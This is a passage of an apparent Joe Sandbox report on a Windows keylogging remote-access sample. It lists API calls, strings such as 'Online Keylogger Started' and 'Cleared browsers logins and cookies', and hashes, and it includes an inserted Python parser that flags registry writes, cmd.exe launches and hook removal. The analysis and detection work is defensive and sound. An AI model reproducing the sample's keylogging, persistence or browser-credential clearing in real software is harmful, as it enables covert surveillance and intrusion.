                                                          • String ID: Online Keylogger Started
                                                          • API String ID: 112202259-1258561607
                                                          • Opcode ID: e51d8b7f57c875fd14822fa47be4c1fb55d37c331493fca39a38941afd0278ea
                                                          • Instruction ID: 13545b77b67cc4507d33d8d8c8ff512a749ba16b8a43449315e0da64450a8124
                                                          • Opcode Fuzzy Hash: e51d8b7f57c875fd14822fa47be4c1fb55d37c331493fca39a38941afd0278ea
                                                          • Instruction Fuzzy Hash: E80161A1A003193AE62076768C86DBF7A6DCA813A8F41043EF541662C3EA7D5D5582FA
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,00000000,8@,?,0044ABA1,8@,0046ED38,0000000C), ref: 0044ACD9
                                                          • GetLastError.KERNEL32(?,0044ABA1,8@,0046ED38,0000000C), ref: 0044ACE3
                                                          • __dosmaperr.LIBCMT ref: 0044AD0E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID: 8@
                                                          • API String ID: 2583163307-819625340
                                                          • Opcode ID: f11388ad4d481d826d75519938a9a20661ac3afaecb278e3b0e3570ed3326013
                                                          • Instruction ID: 727ae4bd5dc399200e14d16721253afac520870d53d00e52bc8525c117eb1139
                                                          • Opcode Fuzzy Hash: f11388ad4d481d826d75519938a9a20661ac3afaecb278e3b0e3570ed3326013
                                                          • Instruction Fuzzy Hash: 6F018836640A100BF3212634688573F67498B91B39F29022FF804872D2CE2D8CC1919F
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                          • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                          • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: CloseEventHandleObjectSingleWait
                                                          • String ID: Connection Timeout
                                                          • API String ID: 2055531096-499159329
                                                          • Opcode ID: c54170f10c28a2d70f0f06c2367e9daa17625b27f18bd79627845602b5625e1d
                                                          • Instruction ID: 3c9b6871d48b6b3111a672927d5bafc1cfd46058a166b60e959a8cf6be3f516d
                                                          • Opcode Fuzzy Hash: c54170f10c28a2d70f0f06c2367e9daa17625b27f18bd79627845602b5625e1d
                                                          • Instruction Fuzzy Hash: 1601F5B1900B41AFD325BB3A8C4255ABFE4AB45315740053FE293A2BA2DE38E440CB5E
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752F0), ref: 00412857
                                                          • RegSetValueExW.ADVAPI32(004752F0,?,00000000,00000001,00000000,00000000,00475308,?,0040E6A3,pth_unenc,004752F0), ref: 00412885
                                                          • RegCloseKey.ADVAPI32(004752F0,?,0040E6A3,pth_unenc,004752F0), ref: 00412890
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: b3a4cd364a4f7c7358af441d7ba84bfe6998b6fc3540b8922562f2b11cb0be87
                                                          • Instruction ID: ab464752906d06cf6e422ab9fb9c42b8cedad3247386a7cb387aa37f92243dc4
                                                          • Opcode Fuzzy Hash: b3a4cd364a4f7c7358af441d7ba84bfe6998b6fc3540b8922562f2b11cb0be87
                                                          • Instruction Fuzzy Hash: 2DF09071500218BBDF50AFA0EE46FEE376CEF40B55F10452AF902B60A1EF75DA08DA94
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CE9C
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CEDB
                                                            • Part of subcall function 004349CD: _Yarn.LIBCPMT ref: 004349EC
                                                            • Part of subcall function 004349CD: _Yarn.LIBCPMT ref: 00434A10
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CEFF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 010949cb006bc602daa897d098c336462d98aae1940c118575e4f0b09407aa79
                                                          • Instruction ID: d3fe92e39fe1a76843bdcbebe92e6b3b15f8dcb0f99b50ce5c9cc2ba4b618b17
                                                          • Opcode Fuzzy Hash: 010949cb006bc602daa897d098c336462d98aae1940c118575e4f0b09407aa79
                                                          • Instruction Fuzzy Hash: FEF03171004214AAC768FB62D853ADE77A4AF14758F504B3FF046224D2AF7CB619C688
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041538C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: ee5632475eb46ff15070bdf5b556040dc051f9dd48e26135e6c52f0a98a02d4f
                                                          • Instruction ID: 200bce0b0309f38ec9064e519a9a4578f5a600b3ca3b701a036ea6d1077247ba
                                                          • Opcode Fuzzy Hash: ee5632475eb46ff15070bdf5b556040dc051f9dd48e26135e6c52f0a98a02d4f
                                                          • Instruction Fuzzy Hash: F1E0C0B11043406AC708FB65DC96DBF77AC9A90749F10483FB582621E2EE78A949865E
                                                          APIs
                                                          • TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                          • UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                          • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: 5ce168509fd4f53ac483e5472d8910f69c83d539265d002f33f874c0df2e9344
                                                          • Instruction ID: 19faee7e247875c6ed4f8509c992ad96cda0262a64c11258bcf204109443e34b
                                                          • Opcode Fuzzy Hash: 5ce168509fd4f53ac483e5472d8910f69c83d539265d002f33f874c0df2e9344
                                                          • Instruction Fuzzy Hash: BEE01DB1245715DFD3101F545C94825BB99EB44746324087FF6C165252CD798C14C759
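The function entries above share one annotation format for their API calls: `• Api.MODULE(arg,arg,...), ref: ADDRESS`, with `Part of subcall function XXXXXXXX:` prefixing calls made from callees and library routines (such as `std::_Lockit::_Lockit.LIBCPMT`) carrying no argument list. Three of those entries describe behaviour worth extracting mechanically: `RegCreateKeyW` with hKey `80000001` (the predefined `HKEY_CURRENT_USER` handle) followed by `RegSetValueExW`, `ShellExecuteW` with `open` on `cmd.exe`, and `UnhookWindowsHookEx` next to `TerminateThread`. The following Python is an added example, not code from the Joe Sandbox report or from Joe Security: it parses that line format and turns call sequences into behaviour findings. The sample lines are copied from the entries above, the predefined-hive constants are the documented Windows values, and the classification rules are the editor's own assumptions about what those sequences indicate, not Joe Sandbox's signature logic.

```python
"""Parse Joe Sandbox-style API annotation lines and derive behaviour findings.

Added example (not part of the Joe Sandbox report). The sample input is
constructed from this report's own 'APIs' entries; the rules in classify()
are the editor's assumptions, not the sandbox's detection logic.
"""
import re
from dataclasses import dataclass

# Constructed sample: API lines as they appear in this report's function entries.
SAMPLE_LINES = """
• RegCreateKeyW.ADVAPI32(80000001,00000000,004752F0), ref: 00412857
• RegSetValueExW.ADVAPI32(004752F0,?,00000000,00000001,00000000,00000000,00475308,?,0040E6A3,pth_unenc,004752F0), ref: 00412885
• RegCloseKey.ADVAPI32(004752F0,?,0040E6A3,pth_unenc,004752F0), ref: 00412890
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041538C
• TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
• UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
• Part of subcall function 0041B8F1: GetForegroundWindow.USER32(?,?,?,?), ref: 0041B901
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CE9C
"""

# Predefined registry hive handles (documented Windows constants).
HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# One annotation line: optional subcall prefix, Api.MODULE, optional (args), ref: hex address.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]{8}:\s*)?"
    r"(?P<api>[\w@:]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int  # address of the call site, as given after 'ref:'


def parse_api_lines(text):
    """Return the ApiCall records found in text; non-API lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # headers, hashes, dump paths, etc.
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def hive_name(arg):
    """Map a hex hKey argument to a predefined hive name, or None if it is not one."""
    try:
        return HKEY_NAMES.get(int(arg, 16))
    except ValueError:  # '?' or a non-hex string placeholder
        return None


def classify(calls):
    """Turn a function's call sequence into behaviour findings (editor's rules)."""
    findings = []
    # Joe's rendering shows static/stack residue for handle arguments, so a
    # RegSetValueEx is correlated with earlier key opens by order, not by handle.
    opened = []
    for c in calls:
        if c.api.startswith(("RegCreateKey", "RegOpenKey")) and c.args:
            hive = hive_name(c.args[0])
            if hive:
                opened.append((hive, c.ref))
        elif c.api.startswith("RegSetValueEx"):
            for hive, ref in opened:
                findings.append(
                    f"registry value written under {hive} "
                    f"(key created/opened at {ref:08X}, value set at {c.ref:08X})"
                )
        elif c.api.startswith("ShellExecute") and any(a.lower() == "cmd.exe" for a in c.args):
            findings.append(f"command interpreter cmd.exe launched via {c.api} at {c.ref:08X}")
        elif c.api == "UnhookWindowsHookEx":
            findings.append(f"Windows hook removed via UnhookWindowsHookEx at {c.ref:08X}")
        elif c.api == "TerminateThread":
            findings.append(f"thread forcibly terminated via TerminateThread at {c.ref:08X}")
    return findings


if __name__ == "__main__":
    for finding in classify(parse_api_lines(SAMPLE_LINES)):
        print(finding)
```

Feeding the whole "APIs" section of an entry to `parse_api_lines` and then `classify` gives one finding list per function; combining the `RegCreateKeyW`/`RegSetValueExW` pair into a single hive-scoped finding is what distinguishes a user-hive write (which needs no elevation) from an `HKEY_LOCAL_MACHINE` write, and the subcall prefix is kept so that calls reached through helper functions (such as the `GetForegroundWindow` chain in the window-title entry below) are not silently dropped.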
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: af13233f64bff1d952fd16752439a8415c6481e4108584e155c4282d62de78f9
                                                          • Instruction ID: 0b1f6a9dfc50a2d3a5cef35921af3bd2f2baba9a31ad448e356136b6fbdd55d0
                                                          • Opcode Fuzzy Hash: af13233f64bff1d952fd16752439a8415c6481e4108584e155c4282d62de78f9
                                                          • Instruction Fuzzy Hash: 3AA14532A042869FFB258E18C8817AFBBA1EF15354F1841AFE8859B382C67C8D41D758
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 74ece5ab94bf9e1454a637eee9e3d981c9d933d52cb43566ce5b815ebd6edde4
                                                          • Instruction ID: 0bd1fcef5d7791e57e96aa6a4775832058b0444fd7bffa6098b49987863132bf
                                                          • Opcode Fuzzy Hash: 74ece5ab94bf9e1454a637eee9e3d981c9d933d52cb43566ce5b815ebd6edde4
                                                          • Instruction Fuzzy Hash: 64415D31900F00ABEF227AB98C9667F3A75DF01775F14411FFC1896293D63C890986AA
                                                          Strings
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                          • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: 974243172e929ecbed863af11f3888abaeff5056eaa34a0c48e853e7952ed2f5
                                                          • Instruction ID: 247d09dce9e3c977c7e86e48a76dae703d52755688f8fe644b587970fcea700c
                                                          • Opcode Fuzzy Hash: 974243172e929ecbed863af11f3888abaeff5056eaa34a0c48e853e7952ed2f5
                                                          • Instruction Fuzzy Hash: FE31A81124C38069CA117B7514167AB6F958A93754F08847FE8C4273E3DB7A480883EF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                          • String ID:
                                                          • API String ID: 188215759-0
                                                          • Opcode ID: a7e496ea74412c4f74dd561fc1d9e5efe2a930fde01781876ab294e7da94f75c
                                                          • Instruction ID: 7cb4eddd506215a21d9c44be4850b318e12e80d273729b61be08d6c7a3dfdc1e
                                                          • Opcode Fuzzy Hash: a7e496ea74412c4f74dd561fc1d9e5efe2a930fde01781876ab294e7da94f75c
                                                          • Instruction Fuzzy Hash: 9A216D725043009FC304EF65D9858AFB7E8EFC8714F044A2EF58593251EA38EA49CBA7
                                                          APIs
                                                            • Part of subcall function 0041B8F1: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B901
                                                            • Part of subcall function 0041B8F1: GetWindowTextLengthW.USER32(00000000), ref: 0041B90A
                                                            • Part of subcall function 0041B8F1: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B934
                                                          • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                          • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: a49d20d3ecb8acddbd4132256805943c56c930b2d695a3c4727dac55219dcbc1
                                                          • Instruction ID: 7bed66d096a43dd94c2219bc8d3cdd3a5a7df98386a17a5ae9bf36b343ab91a8
                                                          • Opcode Fuzzy Hash: a49d20d3ecb8acddbd4132256805943c56c930b2d695a3c4727dac55219dcbc1
                                                          • Instruction Fuzzy Hash: AF119F315042009BD218BB26DC17AAEBBA8AF41708F40047FF542621D3EF79AA1986DE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0179cd47eff8c75336d676f059f6bc7958f0419c29ca715f1c911511461a8d64
                                                          • Instruction ID: b58c8eca075ef28bddc965f0bc4d2171c3ec1f8ef65ef5096018edf4bb449d44
                                                          • Opcode Fuzzy Hash: 0179cd47eff8c75336d676f059f6bc7958f0419c29ca715f1c911511461a8d64
                                                          • Instruction Fuzzy Hash: 2501F2B26093163EF61016796CC1F27671CEF417B8BB1032BB626612D2EEA88C46606D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 112e7316d96929b625426bf143e83baabee3255260599eba4999be5de9cde10c
                                                          • Instruction ID: 7fe3e8edc5bbc175eb6928fc2517c3e9b6b95ea9c4057c88a91cd5d3c4beb3ed
                                                          • Opcode Fuzzy Hash: 112e7316d96929b625426bf143e83baabee3255260599eba4999be5de9cde10c
                                                          • Instruction Fuzzy Hash: F201F9B22096167EB61016796DC4D27676DEF813B83F1033BF421612D1EEA8CC44A179
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043831F
                                                            • Part of subcall function 0043826C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043829B
                                                            • Part of subcall function 0043826C: ___AdjustPointer.LIBCMT ref: 004382B6
                                                          • _UnwindNestedFrames.LIBCMT ref: 00438334
                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438345
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 0043836D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Similarity
                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                          • String ID:
                                                          • API String ID: 737400349-0
                                                          • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction ID: 0bcd00d322a0ad7a372b2cc4a74953bc209b0d499cbe7a3061e5fba3b10c2df3
                                                          • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                          • Instruction Fuzzy Hash: 3E014072100248BBDF126E96CC41DEF7B69EF4C758F04501DFE4866221D73AE861DBA4
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue), ref: 00447452
                                                          • GetLastError.KERNEL32(?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue,0045E328,FlsSetValue,00000000,00000364,?,004471A1), ref: 0044745E
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004473C7,00000000,00000000,00000000,00000000,?,004476F3,00000006,FlsSetValue,0045E328,FlsSetValue,00000000), ref: 0044746C
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: bca6965db1f65f3d9859255c05e5b0128703451981dee5a4eba808798ce175cf
                                                          • Instruction ID: 55721a836d87515a1eea2a56d4c7bce34062b93f94d6470a2cb527c4f3a692dc
                                                          • Opcode Fuzzy Hash: bca6965db1f65f3d9859255c05e5b0128703451981dee5a4eba808798ce175cf
                                                          • Instruction Fuzzy Hash: 6D01FC326497366BD7314F789C44A777FD8AF047617114535F906E3241DF28D802C6E8
                                                          APIs
